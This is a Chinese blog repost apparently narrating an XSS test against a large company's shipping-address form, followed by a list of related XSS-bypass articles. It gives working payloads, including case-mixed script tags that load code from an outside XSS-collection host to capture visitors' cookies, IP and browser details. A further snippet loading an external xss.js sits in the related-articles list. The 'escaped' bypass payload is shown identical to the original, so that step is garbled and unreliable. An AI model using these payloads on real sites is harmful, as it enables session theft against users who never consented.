xss绕过字符过滤_【渗透实例】记录一次XSS渗透过程

最新推荐文章于 2024-06-11 14:40:18 发布
最新推荐文章于 2024-06-11 14:40:18 发布
阅读量879 收藏 1
点赞数
文章标签: xss绕过字符过滤
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_32493541/article/details/112332336
版权

0x01 找到存在XSS的位置

没什么技巧,见到框就X,功夫不负有心人,在目标网站编辑收货地址处发现了存在XSS的地方,没想到这种大公司还会存在XSS。

使用的XSS代码:<img src=1 onerror=alert(1)>

bd8de48fbd7326a8bf7b470d027cfbe4.png

0x02 构造XSS代码连接到XSS平台

XSS平台给我们的XSS代码是这样的:

</tExtArEa>'"><sCRiPt sRC=https://xss8.cc/3Ri4></sCrIpT>

e43cddc17047af54fd493d6dbd3c90f5.png

直接插入的话会提示参数非法,经过多次尝试,最后发现该平台会对双引号、script字符进行识别过滤,大小写会被过滤,于是尝试插入下面的语句:

</tExtArEa>'"><sCRiPt sRC=https://xss8.cc/3Ri4></sCrIpT>

这条代码比上面平台给的XSS代码的多了几个 "",也就是转义字符,利用转义字符可以绕过该平台的策略,因为经验不足,所以在这一步尝试了很多种办法都没能绕过,要不有的可以插入但是连不上XSS平台,要不有的就是被识别拦截。

fffd9399dedf2c304328b134fd302816.png

加上转义字符成功插入后,刷新目标网站与XSS平台页面,在XSS平台就能看到刚才的访问记录。

e60aa72f4ad3668c99e7047070cdcfe0.png

这里可以获取该登陆用户的Cookie、User-Agent、IP地址什么的,但是触发这个XSS需要登陆存在XSS的账号才行,所以个人觉着知道了这个Cookie也没啥用。

并且虽然知道这里存在XSS,但是触发条件是需要知道用户名和密码,然后来到收货地址页面,所以个人感觉作用不大,因此在想这个漏洞还有没有其他的利用价值,后续或许会继续更新本次渗透过程,如果你有什么好的想法,欢迎下方留言。

更多信息欢迎关注微信公众号:TeamsSix
本文仅用作学习交流目的,请勿用作违法目的
原文地址: https://www. teamssix.com/year/19070 3-221956.html
风投小虾
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
JSP过滤器防止Xss漏洞的实现方法(分享)
10-19
通常,过滤过程会涉及到将特定的半角字符(如<、>、'、"等)替换为全角字符或者编码,以防止它们在HTML上下文中被解析为标签或属性。 这样的处理方式虽然可能会牺牲一些用户体验,因为它改变了用户原始输入的格式,...
XSS绕过技巧总结
weixin_51802382的博客
10-22 2305
XSS绕过技巧 作者:白泽Sec安全实验室 前言 XSS是Web应用程序中常见的漏洞之一,网站管理员可以通过用户输入过滤、根据上下文转换输出数据、正确使用DOM、强制执行跨源资源共享(CORS)策略以及其他的安全策略来规避XSS漏洞。尽管现在有很多预防XSS攻击的技术,但Web应用程序防火墙(WAF)或自定义数据过滤器是目前使用比较广泛的安全保护技术了,很多厂商都会利用这些技术来抵御新型的XSS攻击向量 有些时候,通用的绕过技巧并不可行,这个时候我们就得观察缺陷点的周围环境,想想其它办法咯。“猥琐绕过”与通
xss绕过字符过滤_绕过XSS过滤规则
weixin_39576751的博客
12-21 393
相信大家在做***测试的时候都有过这样的经历,明明一个XSS的漏洞,但是却有XSS过滤规则或者WAF保护导致我们不能成功利用,比如我们输入alert("hi"),会被转换为alert(>xssdetected...
XSS攻击绕过方法大全,XSS攻击技巧,收集100种绕过方法分享(2024最新)_xss绕过
最新发布
weixin_42340783的博客
06-11 1338
尽管许多网站实施了输入过滤措施来防止跨站脚本(XSS)攻击,但在特定条件下,经过精心编码的脚本仍有可能实施XSS注入。本文旨在为专业的安全测试人员提供一个跨站脚本漏洞的检测指南。
xss绕过字符过滤_Xss小游戏通关秘籍
weixin_39758712的博客
12-01 495
原创: Kale 合天智汇原创投稿活动:https://link.zhihu.com/?target=https%3A//mp.weixin.qq.com/s/Nw2VDyvCpPt_GG5YKTQuUQ题记最近发现一个xss的攻防网站,界面很有意思,很适合寓教于乐。于是玩了一下午,特此记录下来!xss姿势众多,所以每关也只是给了一部分示例!知识前导什么是XSSXSS 或者说跨站脚本是一种 We...
XSS篇——XSS过滤绕过技巧
weixin_50464560的博客
05-07 3499
无意中发现了一个巨牛巨牛的人工智能教程,忍不住分享一下给大家。教程不仅是零基础,通俗易懂,小白也能学,而且非常风趣幽默,还时不时有内涵段子,像看小说一样,哈哈~我正在学习中,觉得太牛了,所以分享给大家。点这里可以跳转到教程! 改变大小写 在测试过程中,我们可以改变测试语句的大小写来绕过XSS规则: 比如:<script>alert(“xss”);</script>可以...
Web安全渗透学习-过滤方法小白菜总结
weixin_43468445的博客
08-10 554
小白菜过滤总结SQL注入-绕过过滤总结XSS攻击-绕过过滤总结 一名刚入门的小白,通过这些日子的学习和实践操作,发现在SQL注入或者XSS中会遇到许多的过滤情况,然后在这里就大致整理一下有关字符过滤后的一些处理方法,肯定不是很准确的和完整的。并且很多是通过自己在互联网上查询并搜集然后进行实验的。绕WAF啥的我还一脸懵的。 SQL注入-绕过过滤 1.过滤如and,or,union如果是被过滤为...
php处理xss攻击过滤.rar
01-18
然而,随着互联网技术的发展,安全问题也日益突出,其中XSS(跨站脚本攻击)是常见的安全威胁之一。XSS攻击允许攻击者通过注入恶意脚本到网页中,从而获取用户的敏感信息,例如登录凭据或执行其他恶意操作。为了防御...
xss_remove:用于从字符串中完全删除XSS的类。 在PHP中
05-18
XSS / SQLi卸妆用于从PHP字符... 函数cleanInput($data, $addSlashes)有两个参数$data data-要清除的已发布数据,在这种情况下为一个字符串$addSlashes如果要使用$addSlashes ,为了提高安全性,请将其设置为TRUE ,默
Web安全测试之XSS实例讲解
09-01
Web安全测试中的XSS(Cross Site Scripting)是一种常见的网络安全漏洞,它允许攻击者在受害者的浏览器中注入并执行恶意脚本。攻击者通常利用这种漏洞来窃取用户的敏感信息,如Cookie,甚至操纵用户的浏览器行为,将...
xss_test.7z
03-12
"Xss_test"这个文件可能包含了模拟这些攻击场景的实例,以及相应的防御代码示例,通过实践操作,我们可以更好地理解XSS攻击的原理和防护手段,提升我们的安全意识和技术能力。 总之,XSS攻击是Web开发中的一个重要...
信息安全工程实践笔记--Day1 信息收集&漏洞扫描
weixin_46447549的博客
11-22 1749
上课
xss绕过字符过滤_xss绕过过滤方法
weixin_39654848的博客
12-21 904
很多网站为了避免XSS的攻击,对用户的输入都采取了过滤,最常见的就是对<>转换成<以及>,经过转换以后<>虽然可在正确显示在页面上,但是已经不能构成代码语句了。这个貌似很彻底,因为一旦<>被转换掉,什么就会转换成“<script src=1.js></script>”,不能执行,因此,很多人认为只要用户的输入没有构成<&...
base64编码_动画演示 Base 64 编码
weixin_39519741的博客
11-28 224
Base64 是一种十分流行的编码方式,仅仅使用 64 个字符加等号(=) 就可以以文本的形式表示所有的二进制数据了,因为它能够把二进制格式通过编码转换成可见字符,所有我们就可以通过的把二进制格式比如图片,文件等通过 base64 编码然后通过文本的形式共享出去,是不是很神奇呀。编码流程把输入的数据转换成 二进制的形式每 3 个 8bit 为一组拆分为 4 个 6bit 8*3=6*4=24拆分后...
xss攻击
IABQL的博客
08-13 884
程序中如何实现,写一个过滤器,拦截所有获取的参数,将特殊字符转换一下。:使用 Js 脚本语言,因为浏覧器默认支持脚本语言执行,如果在表单提交的时候,提交一些脚本参数,可能浏览直接进行执行。userName参数后面带了一个脚本参数,它打开了另一个页面,这个页面是一个高仿页面,那么就可能盗取信息。比如在评论区中,如果没有做XSS防御处理,那么有人评论了一个带有javascript。像一些特殊字符,比如<、>如果不进行特殊字符处理的话,很就可能受到 XSS 攻击。脚本的评论,那么这个脚本会被浏览器解析执行。...
XSS字符编码及浏览器解析原理
BerL1n
12-29 1421
time: 2019-05-12 21:27 XSS字符编码基本介绍: 提起XSS 想到的就是插入字符字符编码与各种解析了!现在介绍一下在xss中最经常用到的编码 html实体编码(10进制与16进制): 如把尖括号编码[ < ] -----> html十进制: < html十六进制:&#x3 c; javascript的八进制跟十六进制: 如把尖括号编码[ < ] -----> js八进制: \74 js十六进制: \x3c jsunicode编码:
xss漏洞的认知
lizhiguoq的博客
08-04 628
** xss漏洞的认知 ** XSS 同源策略 javaScript中的同源,需要对比 两者中的协议、域名、端口。三者完全相同才认为是同源的,否则即是来自不同源的内容。 Xss概念 恶意攻击者往Web页面里插入恶意Script代码,当用户浏览该页之时,嵌入其中Web里面的Script代码会被执行,从而达到恶意攻击用户的目的。 用户提交的数据没有过滤,或者过滤不严格,输出到网页中 ,导致可以构造执行...
XSS靶场中级绕过
weixin_52714299的博客
07-30 403
xss靶场绕过1—16关解析。
XSS 绕过常用语句
Mr.Huang_的博客
09-16 2652
XSS 绕过常用语句 写在最前面::: 下文中 alert 都可以由 prompt 代替 最常用的 XSS 漏洞测试代码: <script>prompt("XSS")</script> <SCRIPT SRC=http://damit5.ml/xss.js></SCRIPT> 在输入(Input)标签里 <INPUT type="text" value='<SCRIPT>alert("XSS")</SCRIPT>'>
DOM型XSS1
08-08
DOM型XSS(Document Object Model Cross-Site Scripting,文本对象模型跨站脚本攻击)是一种常见的Web应用程序安全漏洞,旨在通过恶意注入脚本代码来实现攻击者的意图。 DOM型XSS攻击的原理是利用客户端的脚本执行...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值